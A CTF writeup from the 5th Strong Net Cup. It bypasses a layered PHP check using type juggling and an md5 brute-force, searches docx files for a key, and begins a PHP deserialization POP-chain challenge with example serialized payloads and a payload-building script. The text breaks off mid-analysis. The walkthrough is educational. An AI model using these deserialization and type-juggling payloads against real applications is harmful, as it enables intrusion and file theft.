
Title: The 5th Strong Net Cup National Cyber Security Challenge Writeup


Web

1. [Strong Net Pioneer] Treasure Hunt

The challenge is handed out; the access link is as follows:

1049983-20211223173925616-142118672.jpg

This challenge requires you to obtain two key values, one from "Information 1" and one from "Information 2", then enter Key1 and Key2 to decrypt the flag.

Key1: code audit

Click "Information 1" and you find that it is a code audit:

1049983-20211223173926650-284071638.jpg

The complete source code is as follows (the comparison operators and the && between conditions were lost in this copy of the page and are restored here from the checks the writeup describes):

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
function filter($string){
    // Several entries between '\,' and '0000000' are garbled in this copy of the page and are left out here.
    $filter_word=array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','0000000');
    $filter_phrase='/'.implode('|',$filter_word).'/';
    return preg_replace($filter_phrase,'',$string);
}
if($ppp){
    unset($ppp);
}
$ppp['number1']='1';
$ppp['number2']='1';
$ppp['nunber3']='1';   // typo is in the original: number3 only exists if the client posts it
$ppp['number4']='1';
$ppp['number5']='1';
extract($_POST);       // ppp[...] fields in the POST body overwrite $ppp
$num1=filter($ppp['number1']);
$num2=filter($ppp['number2']);
$num3=filter($ppp['number3']);
$num4=filter($ppp['number4']);
$num5=filter($ppp['number5']);
if(isset($num1) && is_numeric($num1)){
    die('non-number');
}
else{
    if($num1 > 1024){
        echo 'layer 1';
        if(isset($num2) && strlen($num2)<=4 && intval($num2 + 1)>500000){
            echo 'layer 2';
            if(isset($num3) && '4bf21cd'===substr(md5($num3),0,7)){
                echo 'layer 3';
                if(!($num4<0) && ($num4==0) && ($num4<=0) && (strlen($num4)>6) && (strlen($num4)<8) && isset($num4) ){
                    echo 'layer 4';
                    if(!isset($num5)||(strlen($num5)==0)) die('no');
                    $b=json_decode(@$num5);
                    if($y=$b===NULL){
                        if($y===true){
                            echo 'layer 5';
                            include 'KeY1lhv.php';
                            echo $KEY1;
                        }
                    }else{
                        die('no');
                    }
                }else{
                    die('no');
                }
            }else{
                die('no');
            }
        }else{
            die('no');
        }
    }else{
        die('no111');
    }
}
?>

With the default values $num1 is '1', which is numeric, so the page prints "non-number" underneath the highlighted source.

The checks that have to be bypassed, layer by layer:

Layer 1: $num1 must not be numeric (is_numeric() must fail) yet compare greater than 1024. PHP's loose comparison uses the leading digits of a string such as "11111a" (PHP 8 instead compares it with "1024" as strings, which also holds), so $num1=11111a passes.

Layer 2: intval($num2 + 1) must exceed 500000 while strlen($num2) is at most 4. Scientific notation gets around the length limit: "9e9" is three characters, but "9e9" + 1 evaluates to 9000000001, so $num2=9e9.

Layer 3: the first seven hex characters of md5($num3) must equal 4bf21cd, so write a script to brute-force a matching number; it finds num3 = 61823470. The script:

import hashlib

def md5_encode(num3):
    # first 7 hex characters of the digest, the same as substr(md5($num3),0,7)
    return hashlib.md5(num3.encode()).hexdigest()[0:7]

for i in range(60000000, 70000000):
    if md5_encode(str(i)) == '4bf21cd':
        print(i)
        break

The operation results are as follows:

1049983-20211223173927160-736402045.jpg

Layer 4: $num4 must loosely equal 0 while being exactly 7 characters long (strlen greater than 6 and less than 8). Seven plain zeros are removed by the '0000000' filter entry, so use scientific notation again: 0e00000 is seven characters and evaluates to 0.

1049983-20211223173927543-1345414535.jpg

Layer 5: json_decode() takes a JSON-encoded string and converts it into a PHP value; when the string is not valid JSON it returns NULL. $y = $b === NULL then assigns true to $y, so any non-JSON string works, for example $num5=1a.

Therefore, the final payload (POST body, application/x-www-form-urlencoded; the & separators were lost in this copy of the page):

ppp[number1]=11111a&ppp[number2]=9e9&ppp[number3]=61823470&ppp[number4]=0e00000&ppp[number5]=1a

POST submission gets Key1:

KEY1{e1e1d3d40573127e9ee0480caf1283d6}
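To sanity-check a candidate payload against the five conditions before sending it, here is an added Python model of the server-side checks (example code, not part of the original writeup). It mirrors filter(), is_numeric() and PHP's numeric-string handling closely enough for these inputs, but it is an approximation of PHP semantics, not PHP itself; the filter list omits the entries that are garbled in this copy of the page (an assumption), and no target URL is included, so it only builds the urlencoded body.

```python
import hashlib
import json
import re
from urllib.parse import urlencode

# Filter list from the challenge source. Entries that are garbled in this copy
# of the page are left out (assumption); add them if you have the original file.
FILTER_WORDS = ['php', 'flag', 'index', 'KeY1lhv', 'source', 'key', 'eval', 'echo',
                r'\$', r'\(', r'\.', 'num', 'html', r'\/', r'\,', '0000000']
FILTER_RE = re.compile('|'.join(FILTER_WORDS))   # the alternation preg_replace() builds

# PHP numeric string: optional sign, digits with optional fraction, optional exponent.
NUMERIC_RE = re.compile(r'\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*')
LEADING_RE = re.compile(r'\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')


def php_filter(value):
    """Mirror filter(): strip every occurrence of the blocked words and characters."""
    return FILTER_RE.sub('', value)


def php_is_numeric(value):
    """Approximation of is_numeric() for decimal and scientific-notation strings."""
    return NUMERIC_RE.fullmatch(value) is not None


def php_number(value):
    """Value PHP uses for a (leading-)numeric string in arithmetic, 0 for a non-numeric one.
    PHP 8 compares an int with a non-numeric string as strings instead; for
    '11111a' > 1024 both rules give true, so the approximation holds here."""
    m = LEADING_RE.match(value)
    return float(m.group(0)) if m else 0.0


def md5_prefix(value, n=7):
    return hashlib.md5(value.encode()).hexdigest()[:n]


def find_md5_prefix(prefix, start, stop):
    """Brute-force the integer in [start, stop) whose md5 hex digest starts with prefix."""
    for i in range(start, stop):
        if md5_prefix(str(i), len(prefix)) == prefix:
            return i
    return None


def check_layers(fields):
    """Re-implement the five server-side checks on the filtered values; one bool per layer."""
    n1, n2, n3, n4, n5 = (php_filter(fields[k]) for k in
                          ('number1', 'number2', 'number3', 'number4', 'number5'))
    try:
        decoded = json.loads(n5)
    except ValueError:            # invalid JSON: json_decode() would return NULL
        decoded = None
    return {
        'layer1': not php_is_numeric(n1) and php_number(n1) > 1024,
        'layer2': len(n2) <= 4 and int(php_number(n2) + 1) > 500000,
        'layer3': md5_prefix(n3) == '4bf21cd',
        'layer4': php_number(n4) == 0 and 6 < len(n4) < 8,   # !(<0), ==0 and <=0 all hold at 0
        'layer5': decoded is None,
    }


def build_body(fields):
    """application/x-www-form-urlencoded body; extract($_POST) turns ppp[...] into $ppp."""
    return urlencode({f'ppp[{k}]': v for k, v in fields.items()})


PAYLOAD = {'number1': '11111a', 'number2': '9e9', 'number3': '61823470',
           'number4': '0e00000', 'number5': '1a'}

if __name__ == '__main__':
    print(check_layers(PAYLOAD))
    print(build_body(PAYLOAD))
```

Run it before posting: every layer should report True; a value that the filter silently mutates (for example one containing a dot or the word num) shows up as a failed layer rather than an unexplained "no" from the server.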

Key2: searching the files with a script

1. The prompt gives a download link:

1049983-20211223173927932-601584177.jpg

2. After decompression you get a large number of docx files:

1049983-20211223173928426-1779376784.jpg

3. Opening any of them shows only a jumble of characters:

1049983-20211223173928865-286054451.jpg

4. The guess is that Key2 is in one of the files, so write a script to search them:

import os
import docx   # python-docx

# Directory layout from the archive: ./5.<i>/VR_<j>/ holding the .docx files
for i in range(1, 20):
    for j in range(1, 20):
        path = './5.{0}/VR_{1}'.format(i, j)
        try:
            files = os.listdir(path)
        except OSError:
            continue               # directory does not exist
        for name in files:
            file_name = path + '/' + name
            try:
                document = docx.Document(file_name)
            except Exception:
                continue           # not a readable .docx
            for paragraph in document.paragraphs:
                if 'KEY2{' in paragraph.text:
                    print(paragraph.text)
                    print(file_name)
                    break

The operation results are as follows:

1049983-20211223173929269-581091221.jpg

Get KEY2:

KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}

Submit to get flag on the original page:

1049983-20211223173929623-1155291069.jpg

2. [Strong Net Pioneer] Gambler

The challenge is handed out; the access address is as follows:

1049983-20211223173929968-140881516.jpg

Following the challenge's hint about the source code, scan the directory with dirsearch and find www.zip:

1049983-20211223173930415-1982720835.jpg

Decompress it to obtain the challenge source (the -> arrows and angle brackets were lost in this copy of the page and are restored here):

<meta charset='utf-8'>
<?php
//hint is in hint.php
error_reporting(1);
class Start{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
    public function __construct(){
        echo 'I think you need /etc/hint . Before this you need to see the source code';
    }
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }
    public function __wakeup(){
        echo 'hi';
        $this->_sayhello();
    }
    public function __get($cc){
        echo 'give you flag : '.$this->flag;
        return ;
    }
}
class Info{
    private $phonenumber=123123;
    public $promise='I do';
    public function __construct(){
        $this->promise='I will not !';
        return $this->promise;
    }
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}
class Room{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
    public function __get($name){
        $function=$this->a;
        return $function();
    }
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }
    public function __invoke(){
        $content=$this->Get_hint($this->filename);
        echo $content;
    }
}
if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi=new Start();
}
?>

Seeing this, I guessed it was a PHP deserialization challenge, but the related challenges I had studied before only used the destructor as the trigger. This one had me confused, so I went back over the standard PHP deserialization routine used in CTFs.

PHP magic methods

In PHP, methods whose names start with two underscores (__) are called magic methods. The common ones:

__construct: called when an object is created; generally used to give properties their initial values.
__destruct: the opposite of the constructor; called when the object is destroyed (no references remain, or the script ends).
__toString: called when the object is used as a string.
__sleep: called before serialize() runs on the object (it must return an array of the property names to serialize).
__wakeup: called by unserialize() right after the object has been rebuilt.
__call: called automatically when a method that does not exist in the object is invoked.
__get: triggered when reading an inaccessible (non-existent or non-public) property.
__isset: triggered when isset() or empty() is called on an inaccessible property.
__unset: triggered when unset() is used on an inaccessible property.
__invoke: triggered when the object is called as a function.

For more information see the PHP manual: https://www.php.net/manual/zh/language.oop5.magic.php

Simple example

<?php
class A{
    var $test='demo';
    function __wakeup(){
        eval($this->test);
    }
}
$a=$_GET['test'];
$a_unser=unserialize($a);

Analysis: there is only one class, A, with a single __wakeup() method. As soon as the input is deserialized, __wakeup runs and executes whatever is in the test property. So we construct the following EXP, run locally, to get it to execute phpinfo():

<?php
class A{
    var $test='demo';
    function __wakeup(){
        echo $this->test;
    }
}
$b=new A();
$b->test='phpinfo();';
$c=serialize($b);
echo $c;

Output:

O:1:"A":1:{s:4:"test";s:10:"phpinfo();";}

Submit the output as the test parameter; the result is as follows:

1049983-20211223173931003-408094937.jpg
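Crafting the serialized string by hand gets error-prone as soon as objects nest or carry private properties, because PHP's format stores a byte length for every string and mangles non-public property names with NUL bytes. The following Python serializer is an added example, not code from the writeup: it reproduces the output of PHP's serialize() for the class A example above and for a Start object whose $name holds an Info object from the Gambler source, chosen only to show how a nested object and the private $phonenumber property are encoded. Class names and property values come from the page; the nesting itself is illustrative.

```python
from dataclasses import dataclass
from urllib.parse import quote

PUBLIC, PROTECTED, PRIVATE = 'public', 'protected', 'private'


@dataclass
class PHPObject:
    """Object to serialize: class name and an ordered list of (name, value, visibility)."""
    cls: str
    props: list


def _mangle(obj, name, visibility):
    """PHP prefixes non-public property names with NUL-delimited markers."""
    if visibility == PRIVATE:
        return f'\0{obj.cls}\0{name}'      # "\0ClassName\0prop"
    if visibility == PROTECTED:
        return f'\0*\0{name}'              # "\0*\0prop"
    return name


def php_serialize(value):
    """Produce the text PHP's serialize() would emit for scalars, arrays and objects."""
    if value is None:
        return 'N;'
    if isinstance(value, bool):
        return f'b:{int(value)};'
    if isinstance(value, int):
        return f'i:{value};'
    if isinstance(value, str):
        # Length is in bytes and the content is not escaped: a hand-edited
        # payload whose length no longer matches fails to unserialize.
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, (list, tuple)):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = ''.join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f'a:{len(value)}:{{{body}}}'
    if isinstance(value, PHPObject):
        body = ''.join(php_serialize(_mangle(value, n, vis)) + php_serialize(v)
                       for n, v, vis in value.props)
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f'unsupported type: {type(value).__name__}')


def simple_example_payload():
    """The page's class A example: __wakeup() eval()s $test."""
    return php_serialize(PHPObject('A', [('test', 'phpinfo();', PUBLIC)]))


def nested_example_payload():
    """A Start object whose $name is an Info object (Info's $phonenumber is private)."""
    info = PHPObject('Info', [('phonenumber', 123123, PRIVATE),
                              ('promise', 'I do', PUBLIC)])
    return php_serialize(PHPObject('Start', [('name', info, PUBLIC),
                                             ('flag', 'syst3m("cat 127.0.0.1/etc/hint");', PUBLIC)]))


def as_query_value(payload):
    """Percent-encode for ?hello=...; the NUL bytes in private names must become %00."""
    return quote(payload, safe='')


if __name__ == '__main__':
    print(simple_example_payload())
    print(nested_example_payload())
    print(as_query_value(nested_example_payload()))
```

The property order you pass is the order PHP writes, so a payload built this way can be compared byte for byte with one produced by a local php -r 'echo serialize(...)'; always URL-encode it before putting it in a GET parameter, since a raw NUL byte does not survive the query string.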

A further look at a more advanced POP-chain example (pop3.php; the -> arrows and angle brackets were lost in this copy of the page and are restored here):

<?php
//flag is in flag.php
error_reporting(1);
class Read {
    public $var;
    public function file_get($value)
    {
        $text=base64_encode(file_get_contents($value));
        return $text;
    }
    public function __invoke(){
        $content=$this->file_get($this->var);
        echo $content;
    }
}
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php')
    {
        $this->source=$file;
        echo $this->source.'Welcome'.'<br>';
    }
    public function __toString()
    {
        return $this->str['str']->source;
    }
    public function _show()
    {
        if(preg_match('/gopher|http|ftp|https|dict|\.\.|flag|file/i',$this->source)) {
            die('hacker');
        } else {
            highlight_file($this->source);
        }
    }
    public function __wakeup()
    {
        if(preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this->source)) {
            echo 'hacker';
            $this->source='index.php';
        }
    }
}
class Test{
    public $p;
    public function __construct()
    {
        $this->p=array();
    }
    public function __get($key)
    {
        $function=$this->p;
        return $function();
    }
}
if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $show=new Show('pop3.php');
    $show->_show();
}

Analysis

For this challenge the goal is to read flag.php by constructing a deserialization chain. The Read class has file_get_contents() and the Show class has highlight_file(); either can read a file. Looking for the entry point, the unserialize() call in the last few lines triggers the __wakeup magic method, which is defined in the Show class.

1. The __wakeup method:

public function __wakeup()
{
    if(preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this->source)) {
        echo 'hacker';
        $this->source='index.php';
    }
}

It calls preg_match(), whose second argument must be a string; here $this->source is used as that string. If $source is an object of some class, that class's __toString method is triggered. Reading through the code, the only __toString method is also in the Show class. Then
